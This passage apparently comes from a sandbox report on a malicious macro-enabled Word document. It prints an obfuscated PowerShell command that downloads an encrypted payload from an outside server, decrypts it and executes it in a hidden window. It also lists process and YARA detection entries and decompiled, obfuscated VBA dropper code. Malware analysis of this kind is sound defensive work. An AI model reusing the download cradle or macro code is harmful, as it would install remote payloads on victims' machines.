'ZB5Q=','mklQ','ssion=B43mgp','o69GDp','pT','3P','se','Q','4N'));${S`eR}=('{1}{2}{3}{5}{4}{6}{0}'-f':443','h','ttps:','//','nt','myse','.org');${t}=('{3}{4}{2}{1}{0}'-f'min.php','d','/a','/m','odules');${d`ATA}=${w`c}.('{1}{0}{2}' -f'NLOAdDaT','DOW','A').Invoke(${S`eR}+${t});${iV}=${D`ATA}[0..3];${DA`TA}=${dA`TA}[4..${d`Ata}.'L`eN`GTh'];-JoiN[ChAR[]](^& ${R} ${da`Ta} (${IV}+${k}))^\|.('{0}{1}' -f'I','EX') && sET OMWI=ecHo IEX (GI enV:Kjv).valUe ^\|powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN -&& CMD.ExE /C%OmWi%'
Imagebase:	0x4abb0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000000.16499978274.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000000.16500170033.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000000.16500483468.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000002.16567553929.00321000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000002.16567604876.004A0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000002.16567440908.002D0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000002.16567501646.0030F000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16501342355.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000002.16567480851.002FF000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16503064468.0030C000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16503079730.0030F000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000000.16500917401.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16503118310.00306000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16503179760.002D1000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16506373335.00327000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16503265026.002F9000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16506450727.0031C000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16506487131.0030F000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16503292449.00300000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000021.00000003.16507436398.002FD000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2256 Parent PID: 480

General

Start time:	11:10:12
Start date:	20/06/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CMD.ExE /C%OmWi%
Imagebase:	0x4abb0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000023.00000000.16503997937.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000023.00000000.16505979814.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000023.00000000.16503831032.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000023.00000000.16505682606.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000023.00000002.16571554431.00098000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000023.00000002.16571520029.00070000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000023.00000002.16571590847.000AF000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000023.00000002.16571752140.00440000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000023.00000003.16506433003.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2364 Parent PID: 2256

General

Start time:	11:10:14
Start date:	20/06/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	unknown
Imagebase:
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000024.00000000.16508717527.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000024.00000000.16509432349.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000024.00000000.16509719926.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000024.00000000.16510314431.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3096 Parent PID: 2428

General

Start time:	11:10:15
Start date:	20/06/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	unknown
Imagebase:
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000025.00000000.16510560264.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000025.00000002.16572994813.00160000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000025.00000002.16573202405.004CF000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000025.00000002.16573179221.004BF000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000025.00000002.16573258362.004E1000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000025.00000002.16573119211.00490000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Function tfNaRhVGiNw, APIs: 84, Strings: 32, Number of lines: 45, Relevance: 204.795

APIs	Meta Information
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function czeoPYDHuXBP@ThisDocument: Len
Part of subcall function czeoPYDHuXBP@ThisDocument: Chr
Part of subcall function czeoPYDHuXBP@ThisDocument: Asc
Part of subcall function czeoPYDHuXBP@ThisDocument: Mid

Strings	Decrypted Strings
"49659190"
"\x0192\x2039IN"
"655c7e79"
"4983494e4996"
"\x2013\x2018IN"
"9d549f444f"
"BJD\x9d""S\x0178\x9dR\x0178"
"529f9d539f9d549f"
"\x90\x02dc\x2018\x8d\x2021JJD""\x9dS\x0178\x9dR\x0178DO\x02c6I""\x2021\x8f\x2019INI\x2013IKKB""O\x0192\x90\x2020""BJF\x9d\x201d\x0178PJD\x9d"
"87494e4964"
"NIP\x90"
"6776494e49"
"\x0178DO\x02c6""IuINI"
"529f9d53"
"82879282"
"44424f67"
"748390494e"
"\x9dF\x9dt""\x0178B_B""\x20acHJD""\x9dS\x0178\x9dR""\x0178\x9dT\x0178D""O\x02c6BI"
"98918d87"
"498b908949"
"I\x017d\x2018IN"
"9f9d569f9d539f9d579f9d"
"9f9d589f9d59"
"9b494e49"
"884249696776"
"4a469d92"
"K]kh"
"7a66738b9b83"
"y\x02c6j\x2020"
"mh\x2039x\x0160h\x2018c""\x90k\|\x2039oh\x2122{""\|fd\x0160""u\x0161\x2021\x2020\x0160gzw\x0160\x2014\x2013\x017dd"
"877383717589766c77"
"y\|\x2021\x017d"

Line	Instruction	Meta Information
9	Function tfNaRhVGiNw(rMOBquizQidfuY3 as String) as String
10	Dim tVqwRdTJD as String	executed
11	Dim HtupShcIikIHJa as String
12	Dim RMILlFmHZrQOPHCRxu as String
13	Dim qPreGCnvlhVprSEW as String
14	Dim HDNkzlpcpKsMIdDS as String
15	Dim jGBdSOuaTi as String
16	Dim ICCNmDkzbpo as String
17	Dim bOrzogXniawpXlG as String
18	Dim LEiiNIwNsh as String
19	Dim YeGkemxylp as String
20	Dim nlPgcpOuKKuzykGv as String
21	Dim TPTFQIOU as String
22	Dim ZvPQTIroojCOGl as String
23	Dim lmCPcPVINKG as String
24	Dim QjvgpqCfRFUWjU as String
25	Dim KHtCdGLsLqZV as String
26	Dim apoAXZRsdVd as String
27	Dim zgwEK as String
28	Dim nAPnScPISpGFFRcnF as String
29	qPreGCnvlhVprSEW = "\x0192\x2039IN" & sfiSFQuRDPlM("49659190") & "IKPk" & "\x90\x02dc\x2018\x8d" & "\x2021JJD" & "\x9dS\x0178\x9d" & "R\x0178DB" & "O\x02c6I\x0192\x2026" & "\x0160\x2021INI" & sfiSFQuRDPlM("85494b4b") & sfiSFQuRDPlM("4b5d42469d") & "\x2022\x201acx" & "g\x201a\x2019\x0192" & "\x2013\x0160\x0178B_" & sfiSFQuRDPlM("42469d74") & "\x0178]BF" & "\x9dh\x2014\x201at\x017d" & "\x0178_JD\x9d" & sfiSFQuRDPlM("579f9d529f9d") & sfiSFQuRDPlM("549f9d58") & sfiSFQuRDPlM("9f9d599f") & sfiSFQuRDPlM("9d5a9f9d") & "U\x0178\x9dV\x0178\x9dS\x0178" & "DBO\x02c6I\x2019\x2022\" & "INI\x2013INIQ" & sfiSFQuRDPlM("518f9b958790494e4985858795") & "\x2022P\x017d\x2018\x2030P\x2013INI\x0161IN" & "I\x0160\x2013\x2013INI\x2013P" & sfiSFQuRDPlM("91494e4994494e4989") & sfiSFQuRDPlM("5183494b5d42469d9585828a728263966a9f5f") & "F\x9d\x2022c\x201ax"
30	ZvPQTIroojCOGl = sfiSFQuRDPlM("655c7e79") & "\x2039\x90f\x2018yu~\x2022" & "\x203a\x2022vg\x8fUT~eof" & sfiSFQuRDPlM("50677a8742") & "BQ\x2026BBBDu\x2021vBBuvk" & "_BBBBF\x2039" & "dj\x201dyB_BB}\x2013\x203arg" & "\x7fJD\x9dT\x0178\x9dY\x0178\x9dZ\x0178\x9dU" & "\x0178\x9dR\x0178\x9dW\x0178\x9dS\x0178\x9dX\x0178" & "\x9dV\x0178DO\x02c6BIgt\x2039INItkpiN\x2022INIe" & "qnngINIg\x90INIP\x2018\x201elgev" & "INI\x2026Pf\x2039e\x2013\x2039qpct\x203a}\x2022\x2013IN" & "I\x203au\x2013goINI\x2026INI\x2013k\x2018p\x2022P\x2030IK]B" & sfiSFQuRDPlM("4242504a449d529f9d539f9d54")
31	HtupShcIikIHJa = "\x2013\x2018IN" & sfiSFQuRDPlM("4983494e4996") & sfiSFQuRDPlM("8b8e9549") & "KKPIi" & sfiSFQuRDPlM("6796688b8782") & sfiSFQuRDPlM("8e66494a") & sfiSFQuRDPlM("4a449d53") & sfiSFQuRDPlM("9f9d529f") & "\x9dV\x0178\x9dT\x0178\x9d" & "W\x0178\x9dU\x0178D" & sfiSFQuRDPlM("424f884983494e") & "I\x2026IN" & sfiSFQuRDPlM("49859b75494e4995") & "INI\x2026\x0160" & sfiSFQuRDPlM("878669949197927291") & "\x017d\x2039INI" & "\x2021\x2013\x2013\x2039\x90\x2030IKNIpI" & sfiSFQuRDPlM("4d4a449d559f9d549f9d539f9d52") & "\x0178DBO\x02c6I\x2026I" & "NI\x2039INI\x017d\x2039\x2026Nu\x2013\x0192" & "\x2013INI\x2018\x90r\x2014\x201eIKK]khJF" & "\x9d\x2030\x201a\x2019\x02c6\x0178K\x9dF\x9di\x201a" & "\x2019e\x0178_F\x9di\x201arh\x0178PJD\x9dR\x0178\x9dS\x0178\x9dT\x0178DBO"
32	apoAXZRsdVd = "BJD\x9d" & "S\x0178\x9dR\x0178" & sfiSFQuRDPlM("9d549f444f") & "\x02c6I\x2039c\x201e" & "nINI\x02dcc" & "\x201dINI\x2021" & "\RV\x8d" & "IKBJ" & "BB}\x2013\x203ar\x2021" & sfiSFQuRDPlM("7f4a449d56") & sfiSFQuRDPlM("9f9d559f9d52") & sfiSFQuRDPlM("9f9d539f9d579f") & "\x9dT\x0178DO\x02c6B" & sfiSFQuRDPlM("4950958774") & sfiSFQuRDPlM("986b656792494e4991") & sfiSFQuRDPlM("494e4963") & "\x90ci\x2021tINIP" & "\x90gvINIu" & "\x203auv\x2021oI" & "NIk\x90" & sfiSFQuRDPlM("966f494b4b42425d42424670988353") & "kBB_B}\x2013\x203a" & "r\x2021\x7fJD\x9dR\x0178\x9dS\x0178\x9dX" & "\x0178\x9dV\x0178\x9dT\x0178\x9dW\x0178\x9dU\x0178DO" & "hIu{INIu\x2013gINI\x2013P" & sfiSFQuRDPlM("7967494e499787757649")
33	ICCNmDkzbpo = "\x90\x02dc\x2018\x8d\x2021JJD" & "\x9dS\x0178\x9dR\x0178DO\x02c6I" & "\x2021\x8f\x2019INI\x2013IKKB" & "O\x0192\x90\x2020" & "BJF\x9d\x201d\x0178PJD\x9d" & sfiSFQuRDPlM("529f9d539f9d549f") & "DO\x02c6IvINI\x2018nINI\x2018\x2122\x2021" & "\x201dIKPk\x90\x02dc\x2018\x8d\x2021" & "JKKPJD\x9dS\x0178\x9dR\x0178DO" & sfiSFQuRDPlM("88424995494e4965919096838b90494b506b9098918d") & "\x2021JD\x2013\x8f\x2019DKBO\x0192\x90\x2020BJF\x9dt\x0178P" & "JD\x9dR\x0178\x9dS\x0178D" & "O\x02c6Iv\x2018n\x2018\x2122INI\x2021\x201dIKPk\x90\x02dc\x2018\x8d\x2021JKKPJD\x9dT\x0178\x9dS" & "\x0178\x9dR\x0178DBO\x02c6I\x90\x2022INI\x2013"
34	nAPnScPISpGFFRcnF = "NIP\x90" & sfiSFQuRDPlM("87494e4964") & "\x201dgsIN" & sfiSFQuRDPlM("498f494b5d") & "BPJD" & sfiSFQuRDPlM("9d549f9d52") & "\x0178\x9dS\x0178" & "DBO\x02c6Ig" & "INIo" & "INI\x2022\x2021v" & sfiSFQuRDPlM("4f8b76494b42") & "BJDxDMDc" & sfiSFQuRDPlM("94444d446b83") & "DMDd\x017d\x2021\\x8d" & "\x8f\x2020DKBBJ" & "B}\x2013{r\x2021\x7fJ" & "D\x9dX\x0178\x9dU\x0178" & sfiSFQuRDPlM("9d569f9d579f9d529f9d54") & "\x0178\x9dS\x0178" & sfiSFQuRDPlM("444f684990766b838e8563") & sfiSFQuRDPlM("494e496a67494e4985") & "INI\x2022\x2013\x2021INIoP" & "\x90INI\x2021v" & "Pet\x2021\x2020\x2021INI\x2022{IKKB]BBBF" & "\x201e\x201c\x02dcoB_B}v\x203a\x2019g\x7fJD" & sfiSFQuRDPlM("9d549f9d52")
35	LEiiNIwNsh = "\x0178DO\x02c6" & "IuINI" & sfiSFQuRDPlM("6776494e49") & "O\x2039vgo" & "IKBJD\x9dR\x0178" & "\x9dT\x0178\x9dS" & "\x0178DBO\x02c6B" & "Ixc\x201dI" & "NIn\x2021\" & "YdSoINI\x2039" & "cdIKBBJ}\x2013{" & sfiSFQuRDPlM("72877f4a") & "D\x9dT\x0178\x9dU\x0178\x9d" & "S\x0178\x9dR\x0178DBO\x02c6I" & "q\x2026\x8dINI\x017d" & "INI\x2022INI\x2026" & "\x201dk\x2019\x2013\x201eIK" & "BBKB]BBBFo\|u" & sfiSFQuRDPlM("5f7d967b72677f4a44") & "\x9dR\x0178\x9dS\x0178DOhB" & "ItINIghIKB]BBBB\x20acHJD\x9dS\x0178" & "\x9dT\x0178\x9dR\x0178DO\x02c6BIO\x2039v" & sfiSFQuRDPlM("676f494e497567494e4976494b")
36	QjvgpqCfRFUWjU = sfiSFQuRDPlM("529f9d53") & sfiSFQuRDPlM("549f9d58") & "\x0178\x9dSR" & "\x0178\x9d[\x0178" & sfiSFQuRDPlM("9d5a9f9d57") & sfiSFQuRDPlM("9f9d569f") & "\x9dT\x0178\x9dU" & "\x0178\x9dS\x0178\x9dY" & "\x0178\x9dSS\x0178\x9dS" & "V\x0178\x9dSU\x0178" & sfiSFQuRDPlM("44424f884249") & "jmeI" & "NI\x90\x2013xINI" & "\x2019e\x2014\x201d" & "INI\x201d" & sfiSFQuRDPlM("87494e49919995") & sfiSFQuRDPlM("767c494e") & "I\x201d\x2018\x2022\x2018\x02c6" & "\x2013v\|\x2019y\x2039\x90\x2020INI\v\|" & sfiSFQuRDPlM("494e4987949549") & "NI\x2019o\x2039\x2026INI\x2021v\|" & sfiSFQuRDPlM("494e499275918896998394494e498b9190494e497749") & "NIt\x2014\x90INIv\|\x2019IKKPJD\x9dR\x0178\x9dS\x0178DBO\x02c6" & "Itg\x2019\x017dINI\x0192\x2026\x2021IKPk\x90"
37	bOrzogXniawpXlG = sfiSFQuRDPlM("82879282") & "c\x2013j\x0178" & sfiSFQuRDPlM("4d4a4a4a") & "D\x9dU\x0178" & sfiSFQuRDPlM("9d529f9d") & "S\x0178\x9dT" & sfiSFQuRDPlM("9f44424f88") & sfiSFQuRDPlM("49658e494e49") & "\x2039\x201e\x2022\x203a" & "INI\x2022" & sfiSFQuRDPlM("508a9683494e") & "IkvIK" & sfiSFQuRDPlM("4b4f9487928e") & sfiSFQuRDPlM("63656742424a7d") & "\x2026j\x0192t\x7fYU" & sfiSFQuRDPlM("4d7d856a") & "\x0192t\x7fZVM" & "}\x2026j\x0192" & "t\x7fXY" & "KN}\x2026j\x0192t\x7f[T" & "K]PJJJD\x9dS" & "\x0178\x9dY\x0178\x9dU\x0178\x9dW" & "\x0178\x9dX\x0178" & sfiSFQuRDPlM("9d549f9d5b9f9d5a9f9d529f9d569f44424f884249") & "\x0161INIe\\x02c6d" & "[y\x2039\x90\x2020\x2018\x2122INI\x8fUT\x02c6d[\x2026\x2021\x201d\x2013\x2014\x2013\x2039\x017dINId[uINI\x2021INI"
38	HDNkzlpcpKsMIdDS = sfiSFQuRDPlM("44424f67") & "\x201d\x201d\x2018\x201d" & sfiSFQuRDPlM("6385968b") & sfiSFQuRDPlM("9190424a") & "D\x9dS\x0178\x9d" & sfiSFQuRDPlM("569f9d52") & "\x0178\x9dU\x0178" & "\x9dT\x0178DO\x02c6" & "I\x2013\x017d\x203aeIN" & "Iu\x2039\x017d\x2021" & "INI\x90" & "\x2013\x2039\x90\x2014\x2021" & sfiSFQuRDPlM("494e4991") & "INI\x90IKB\x20ac\x017eB" & sfiSFQuRDPlM("504a449d52") & sfiSFQuRDPlM("9f9d539f9d549f9d559f44") & "O\x02c6IyINI\x0160\x2021\x201d" & "INI\x2021Oq\x201e\x0152\x2021I" & "NI\x2026\x2013IKBOh" & "\x2039\x017d\x2013\x2021\x201du\x2026\x201d\x2039\x2019\x2013B\x9dJF\x9d\x81\x0178P" & sfiSFQuRDPlM("446f71826687447d527f42") & "O\x2021\x201cBD\x2020DK\x0178B\x20ac\x017eB\x20acHJIGIKB\x9dF\x9d\x81\x0178PDh\x201aw\x017d\x017d\x90c" & sfiSFQuRDPlM("826f87449f5d42869142")
39	nlPgcpOuKKuzykGv = "\x9dF\x9dt" & "\x0178B_B" & "\x20acHJD" & "\x9dS\x0178\x9dR" & "\x0178\x9dT\x0178D" & "O\x02c6BI" & sfiSFQuRDPlM("748390494e") & "Ii\x2021\x2013OI" & "NI\x2020\x2018\x8fI" & sfiSFQuRDPlM("4b42469d") & sfiSFQuRDPlM("72826376") & "j\x0178\x0178By\x0160\x2039" & sfiSFQuRDPlM("8e87424a4a504a44") & sfiSFQuRDPlM("9d529f9d54") & "\x0178\x9dS\x0178DB" & "O\x02c6Iv\x2021INI\x0192\x2013\x0160" & "INI\x2022\x2013OrI" & "KBF\x9dt\x0178K" & "BO\x0192\x90\x2020BJF" & "\x9d\x201d\x0178PJ" & sfiSFQuRDPlM("449d539f9d529f9d549f444f8849919987494e4976916e494e4994494b506b9098918d874a4b4b504a449d539f9d529f9d549f444f8842498b90494e496591909683494e4995494b") & "Pk"
40	RMILlFmHZrQOPHCRxu = sfiSFQuRDPlM("98918d87") & "JIv\|" & "\x2019INI~" & "IKKB" & sfiSFQuRDPlM("424f78838e") & sfiSFQuRDPlM("978742469d") & sfiSFQuRDPlM("9565828a") & "\x2019\x201acv\x0160" & "\x0178BOp\x0192" & "\x8f\x2021BJD" & sfiSFQuRDPlM("9d539f9d55") & sfiSFQuRDPlM("9f9d529f") & "\x9dT\x0178\x9d" & "V\x0178DBO\x02c6" & "BI\x017d\x2039\x2030" & "\x0160\x2013w\x2019\x2020" & sfiSFQuRDPlM("8396494e4975") & sfiSFQuRDPlM("8b8e9949") & "NI\x2021e\x2018I" & "NI\x2021\x201dINI\x201d\x2021" & "t\x2014\x90IK]F" & "\x9d\x2021t\x201d\x2018\x201a" & sfiSFQuRDPlM("7482638582") & "v\x201ak\x201a\x2018pr\x201d" & sfiSFQuRDPlM("6768826794679085679f425f42") & "JD\x9dU\x0178\x9dT\x0178\x9dV\x0178\x9d" & sfiSFQuRDPlM("529f9d539f44424f88499097494e4987494e49968e9b6591494e49758b8e") & sfiSFQuRDPlM("8790494e4990968b49")
41	jGBdSOuaTi = "I\x017d\x2018IN" & sfiSFQuRDPlM("498b908949") & sfiSFQuRDPlM("4b7f7d4a44") & "\x9dU\x0178\x9dT\x0178" & "\x9dR\x0178\x9dS\x0178D" & "BO\x02c6I\x201e\x017d" & "\x2021u\x2026\x201d\x2039I" & "NI\x2019\x2013" & "dINI\x0192I" & sfiSFQuRDPlM("4e496790494b4d") & "JD\x9dS\x0178\x9dR\x0178" & sfiSFQuRDPlM("9d549f444f") & "\x02c6BI\x2018" & "\x2030INI\x017d" & "\x2018\x2026\x8dnINI\x2030\x2039\x90\x2030" & "IK\x7f_R]F\x9d\x2030\x201a\x2019\x2026" & "\x0178}JD\x9dR\x0178\x9dS" & sfiSFQuRDPlM("9f44424f884249758549") & sfiSFQuRDPlM("4e49948b929664494b") & "MJD\x9dT\x0178\x9dU\x0178\x9dR\x0178\x9dS" & "\x0178DO\x02c6BI\x8dn\x2018\x2030\x2030INI\x2039\x90\x2030INI" & "\x017dINI\x2018\x2026IK\x7f}JD\x9dR\x0178\x9dV\x0178\x9dT\x0178\x9dW\x0178\x9dS"
